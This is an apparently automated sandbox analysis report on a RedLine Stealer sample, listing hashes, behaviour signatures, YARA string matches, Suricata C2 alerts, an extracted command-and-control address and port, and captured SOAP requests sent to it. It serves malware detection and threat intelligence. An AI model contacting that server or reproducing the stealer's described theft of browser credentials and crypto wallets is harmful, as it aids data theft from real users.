Edit tour

Windows Analysis Report
K3xL5Xy0XS.exe

Overview

General Information

Sample name:	K3xL5Xy0XS.exe renamed because original name is a hash value
Original sample name:	6AFDD0CBDF70F3E75F423B1557648E85.exe
Analysis ID:	1580311
MD5:	6afdd0cbdf70f3e75f423b1557648e85
SHA1:	6c5cf72a38f08fd41b9f4943efaa4fa3b4d92c66
SHA256:	f5a76af6335f9ea831901a5fac818c22393fdb2d0d9408ce373018b24a2ddb71
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected RedLine Stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Found API chain indicative of sandbox detection

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

K3xL5Xy0XS.exe (PID: 3808 cmdline: "C:\Users\user\Desktop\K3xL5Xy0XS.exe" MD5: 6AFDD0CBDF70F3E75F423B1557648E85)

RegSvcs.exe (PID: 2368 cmdline: "C:\Users\user\Desktop\K3xL5Xy0XS.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.90:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
Process Memory Space: K3xL5Xy0XS.exe PID: 3808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: K3xL5Xy0XS.exe PID: 3808	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: K3xL5Xy0XS.exe PID: 3808	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0xe0ddbc:$a4: get_ScannedWallets 0xe0cc63:$a5: get_ScanTelegram 0xe0da45:$a6: get_ScanGeckoBrowsersPaths 0xe0b8f6:$a7: <Processes>k__BackingField 0xe08e29:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xe0b22a:$a9: <ScanFTP>k__BackingField
Process Memory Space: RegSvcs.exe PID: 2368	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 2368	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 2368	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1ad018:$a4: get_ScannedWallets 0x1abebf:$a5: get_ScanTelegram 0x1acca1:$a6: get_ScanGeckoBrowsersPaths 0x1aab52:$a7: <Processes>k__BackingField 0x1a8085:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1aa486:$a9: <ScanFTP>k__BackingField
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.K3xL5Xy0XS.exe.2260000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.K3xL5Xy0XS.exe.2260000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.K3xL5Xy0XS.exe.2260000.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.K3xL5Xy0XS.exe.2260000.1.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.K3xL5Xy0XS.exe.2260000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
1.2.RegSvcs.exe.160000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RegSvcs.exe.160000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.RegSvcs.exe.160000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
1.2.RegSvcs.exe.160000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
1.2.RegSvcs.exe.160000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
Click to see the 10 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:07:15.348866+0100	2045000	1	Malware Command and Control Activity Detected	185.222.58.90	55615	192.168.2.4	49730	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:07:19.970490+0100	2045001	1	Malware Command and Control Activity Detected	185.222.58.90	55615	192.168.2.4	49730	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:07:10.222100+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.222.58.90	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:07:15.649470+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.222.58.90	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:07:23.396942+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49734	185.222.58.90	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:07:20.253921+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49732	185.222.58.90	55615	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:07:10.222100+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.222.58.90	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 1.2.RegSvcs.exe.160000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: K3xL5Xy0XS.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: K3xL5Xy0XS.exe

Joe Sandbox ML: detected

Source: K3xL5Xy0XS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: RegSvcs.exe, 00000001.00000002.1882328233.0000000000617000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.0000000004100000.00000004.00001000.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1704029900.0000000003F60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.0000000004100000.00000004.00001000.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1704029900.0000000003F60000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0022DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0022DBBE
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_002368EE FindFirstFileW,FindClose,	0_2_002368EE
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0023698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0023698F
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0022D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0022D076
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0022D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0022D3A9
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00239642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00239642
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0023979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0023979D
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00239B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00239B2B
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00235C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00235C97

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49730 -> 185.222.58.90:55615
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49730 -> 185.222.58.90:55615
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49732 -> 185.222.58.90:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49734 -> 185.222.58.90:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.90:55615 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49730 -> 185.222.58.90:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.90:55615 -> 192.168.2.4:49730

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.222.58.90:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49734

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 185.222.58.90:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:55615Content-Length: 987905Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:55615Content-Length: 987897Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 185.222.58.90 185.222.58.90

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
